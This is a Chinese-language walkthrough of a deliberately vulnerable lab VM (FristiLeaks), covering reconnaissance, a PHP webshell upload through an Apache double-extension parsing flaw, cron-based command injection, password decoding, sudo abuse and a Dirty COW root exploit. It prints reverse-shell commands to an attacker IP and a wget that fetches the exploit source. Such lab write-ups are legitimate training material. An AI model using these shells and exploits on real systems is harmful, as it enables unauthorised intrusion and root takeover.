# 靶场搭建

下载下来是个 OVA,通过虚拟机的打开,导入 OVA 虚拟机,导入的过程中会报一次错,直接点重试就可以。

导入进去后添加一个网卡,使用 NAT 模式,并且需要将这张 NAT 模式的网卡的 MAC 地址设置为 08:00:27:A5:A6:76 。在设置中的高级选项卡内

环境配置可见: https://blog.csdn.net/weixin_45744814/article/details/120168008

IP 地址: 192.168.74.138

# 信息收集

# nmap

做一个全端口快速 saomiao

┌──(root㉿kali)-[~]
└─# nmap -p- -T5 192.168.74.138      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 04:08 EDT
Nmap scan report for bogon (192.168.74.138)
Host is up (0.00045s latency).
Not shown: 65479 filtered tcp ports (no-response), 55 filtered tcp ports (host-prohibited)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 71.77 seconds

发现只开了 80 端口,这就有点意思了,多半是要做 web 安全噜

# dirsearch

┌──(root㉿kali)-[~]
└─# dirsearch -u 192.168.74.138
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict
  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/_192.168.74.138/_24-04-08_04-10-32.txt
Target: http://192.168.74.138/
[04:10:38] Starting: 
[04:10:41] 403 -  213B  - /.ht_wsr.txt                                      
[04:10:41] 403 -  216B  - /.htaccess.bak1                                   
[04:10:41] 403 -  218B  - /.htaccess.sample                                 
[04:10:41] 403 -  216B  - /.htaccess.save
[04:10:41] 403 -  217B  - /.htaccess_extra
[04:10:41] 403 -  216B  - /.htaccess_orig                                   
[04:10:41] 403 -  216B  - /.htaccess.orig
[04:10:41] 403 -  214B  - /.htaccess_sc
[04:10:41] 403 -  214B  - /.htaccessOLD
[04:10:41] 403 -  207B  - /.html
[04:10:41] 403 -  206B  - /.htm
[04:10:41] 403 -  214B  - /.htaccessBAK                                     
[04:10:41] 403 -  215B  - /.htaccessOLD2
[04:10:41] 403 -  216B  - /.htpasswd_test                                   
[04:10:41] 403 -  212B  - /.htpasswds                                       
[04:10:41] 403 -  213B  - /.httr-oauth                                      
[04:11:04] 403 -  210B  - /cgi-bin/                                         
[04:11:13] 403 -  208B  - /error/                                           
[04:11:19] 301 -  237B  - /images  ->  http://192.168.74.138/images/        
[04:11:19] 200 -    1KB - /images/
[04:11:40] 200 -   62B  - /robots.txt                                       
                                                                             
Task Completed

dirsearch 扫了一下也并没有发现什么很有价值的东西

# nikto

┌──(root㉿kali)-[~]
└─# nikto -h 192.168.74.138
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.74.138
+ Target Hostname:    192.168.74.138
+ Target Port:        80
+ Start Time:         2024-04-08 04:10:58 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
+ /: Server may leak inodes via ETags, header found with file /, inode: 12722, size: 703, mtime: Tue Nov 17 13:45:47 2015. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /robots.txt: Entry '/cola/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/sisi/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/beer/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 3 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.0.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.3.3 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE .
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ PHP/5.3 - PHP 3/4/5 and 7.0 are End of Life products without support.
+ /icons/: Directory indexing found.
+ /images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8911 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time:           2024-04-08 04:11:32 (GMT-4) (34 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

nikto 提示我们在 robots.txt 中有一些东西可能感兴趣

# 想象力

三个目录,点开都是一张突图片,难道是隐写术?没道理啊 ==、

瞧了一眼别人的解题,发现是让我们自己找路径 ==、给的提示就是 THIS IS NOT THE URL 以及首页的图片。

好吧这也算是信息收集的一部分,真抽象啊

猜一猜猜出来 http://192.168.74.138/fristi/ 这个了。像我这种缺乏想象力的人真的头疼,想过用爬虫但是这个页面太分散了,估计也爬不出来,要么就是枚举。但是为什么要去做枚举呢?没有任何道理啊!

# 图片

拿到这这个路径之后打卡看了看,发现是个登录口,感到了困惑

那么现在做两个尝试,SQL 注入和信息收集,我感觉这个靶场偏搞怪,F12 看了一下源代码,发现里面有注释,是 Base64 编码,转了一下发现是个图片,打开图片看了看,里面的文字是: keKkeKKeKKeKkEkkEk 。不确定作用,感觉是嘲讽,尝试当做密码和路径都没有结果

回到 dirsearch 中对这个路径在扫一下,发现 uploads 文件夹,但是没有办法直接访问,说明至少后面有文件上传的内容

思路很卡,翻了半天直接打开了 HTML 源码瞅了瞅,发现还有一个注释没看见

<!-- 
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.
- by eezeepz
-->

发现有一个人交 eezeepz ,那么就直接登录了

账号密码: eezeepz/keKkeKKeKKeKkEkkEk

# 漏洞利用

# 文件上传

登录进去之后果然就是一个文件上传页面

随便上传一个 php 文件,发现有限制,后端验证。那就要结合收集到的信息做文件上传绕过了, apache 2.2.15 版本的,干他

查了一下,apache 有解析漏洞,靶场使用了白名单过滤且没有进行文件名重命名。这样可以通过修改后缀名进行上传。上传一个 1.php.jpg 的一句话木马,虽然后缀是 jpg 但是会按照 php 解析。使用蚁剑连接就拿到了低权限 shell。

需要去回顾 apache 的解析漏洞,并且构建利用方式,已经记不清楚了

# 提权

拿到 apache 的 shell 之后就要进行提权了

# 通过提示 sudo 提权

查看用户发现存在三个用户

其中的 eezeepz 用户目录可以访问,打开后里面有一个 notes.txt 进行提示

内容:Jerry 设置了一些自动化检查任务供您使用,但他只允许您访问 /usr/bin/* 系统二进制文件。然而,他还复制了一些常用命令到他的家目录:chmod、df、cat、echo、ps、grep、egrep,这些命令您可以从 /home/admin/ 目录中使用。要运行这些命令,您需要在 /tmp/ 目录中创建一个名为 "runthis" 的文件,每行一个命令。输出将被存储在 /tmp/ 目录中的名为 "cronresult" 的文件中。这些命令应该每分钟以 Jerry 的账户权限运行。

所以我们在 /tmp/runthis 设置命令,每分钟 Jerry 的 admin 权限都会去执行

我在想需要用到定时任务吗?

我尝试用 apache 账号做一些操作,比如查看有没有 sudo 权限,结果 sudo -l 还需要交互 shell。我通过反弹 Bash TCP 弹出来: bash -i >& /dev/tcp/192.168.74.129/1234 0>&1 ,使用 python 提供构建交互式 shell: python -c 'import pty;pty.spawn("/bin/bash")' 。然后执行 sudo -l 发现还需要密码。

使用 apache 账号除非直接用内核提权脚本不然估计不行

还是走计划任务里 admin 账号权限看看

尝试 echo "/usr/bin/../../bin/bash -i > /dev/tcp/192.168.74.129/4455 0<& 2>&1" > /tmp/runthis 获取 shell,但是不行,监听的 nc 直接就死了,不知道什么原因,我猜是因为 tty 并不全的原因,知道的老哥踢我

直接把 admin 的 home 目录设置成所有用户可访问拉倒了: echo '/usr/bin/../../bin/chmod -R 777 /home/admin' > /tmp/runthis

一分钟后就可以进入 admin 目录下了,进入 admin 目录下看到有一些敏感的文件

bash-4.1$ cat /home/admin/whoisyourgodnow.txt
cat /home/admin/whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG
bash-4.1$ cat /home/admin/cryptedpass.txt
cat /home/admin/cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq
bash-4.1$ cat /home/admin/cryptpass.py 
cat /home/admin/cryptpass.py
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys
def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1])
print cryptoResult

编写解密函数对两个密码进行解密

#decoderot13.py
import base64,codecs,sys
def decodeString(str):
    base64string= codecs.decode(str,'rot13')
    return base64.b64decode(base64string[::-1])
cryptoResult=decodeString(sys.argv[1])
print cryptoResult

得到两个密码: LetThereBeFristi!thisisalsopw123 ,分别是 fristigodadmin 的密码

登录 fristigod 账号

[admin@localhost uploads]$ su fristigod
su fristigod
Password: LetThereBeFristi!
bash-4.1$ whoami
whoami
fristigod

我之前在 admin 上找过了,没有 sudo 权限,fristigod 账号上有

bash-4.1$ sudo -l
sudo -l
[sudo] password for fristigod: LetThereBeFristi!
Matching Defaults entries for fristigod on this host:
    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User fristigod may run the following commands on this host:
    (fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom

可以通过 sudo 使用 fristi 身份运行 /var/fristigod/.secret_admin_stuff/doCom ,能够以 root 权限打开一个 bash,就最终拿到 root 权限了

bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
bash-4.1# whoami
whoami
root

# 脏牛提权

搜一下脏牛提权的代码

──(root㉿kali)-[~]
└─# searchsploit dirty       
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1)                                                                                                     | linux/dos/43199.c
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2)                                                                                                     | linux/dos/44305.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method)                                                         | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)                                                            | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method)                                                                               | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)                                                         | linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method)                                                                                | linux/local/40611.c
Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe)                                                                                                        | linux/local/50808.c
Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL                                                                                            | android/dos/46941.txt
Quick and Dirty Blog (qdblog) 0.4 - 'categories.php' Local File Inclusion                                                                                                  | php/webapps/4603.txt
Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion                                                                                                   | php/webapps/3729.txt
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1)                                                                                                        | linux/local/46361.py
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2)                                                                                                        | linux/local/46362.py
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Paper Title                                                                                                                                                               |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
DirtyTooth: Extracting VCARD data from Bluetooth iOS profiles                                                                                                              | docs/english/42430-dirtytooth-ex
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

符合内核版本的都可以用,我用了那个 40839.c

┌──(root㉿kali)-[~]
└─# service apache2 start
┌──(root㉿kali)-[~]
└─# cp 40839.c /var/www/html
bash-4.1$ wget http://192.168.74.129/40839.c -O 40839.c
wget http://192.168.74.129/40839.c -O 40839.c
bash-4.1$ gcc -pthread 40839.c -o dirty -lcrypt
gcc -pthread 40839.c -o dirty -lcrypt
./dirty 123456
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 123456
Complete line:
firefart:fi8RL.Us0cfSs:0:0:pwned:/root:/bin/bash
mmap: 7fa407cb0000
┌──(root㉿kali)-[~]
└─# nc -lnvp 1234
listening on [any] 1234 ...
connect to [192.168.74.129] from (UNKNOWN) [192.168.74.138] 37326
bash: no job control in this shell
bash-4.1$ su firefart
su firefart
standard in must be a tty
bash-4.1$ python -c 'import pty;pty.spawn("/bin/bash");'
python -c 'import pty;pty.spawn("/bin/bash");'
bash-4.1$ su firefart
su firefart
Password: 123456
[firefart@localhost uploads]#

拿到了 root 权限

注意编译的时候需要加参数的!

这个命令是使用 gcc 编译器来编译一个名为 40839.c 的源代码文件,并生成一个名为 dirty 的可执行文件。具体解释如下:

  • gcc :是 GNU Compiler Collection 的缩写,是一个常用的 C 语言编译器。
  • -pthread :选项用于指示编译器链接 POSIX 线程库,以支持多线程编程。
  • 40839.c :是源代码文件的名称,通常以 .c 作为 C 语言源文件的扩展名。
  • -o dirty :选项用于指定生成的可执行文件的名称为 dirty
  • -lcrypt :选项用于指示编译器链接 libcrypt 库,该库提供了密码加密和验证功能。

综合起来,这个命令的目的是编译 40839.c 这个源代码文件,生成一个名为 dirty 的可执行文件,并在编译过程中链接 libcrypt 库以支持密码加密和验证功能。

# 小结

  • rot13 加密
  • 查找有用的信息
  • 脏牛提权
  • apache 解析漏洞

急需复盘 apache 历史漏洞!研究综合利用方式。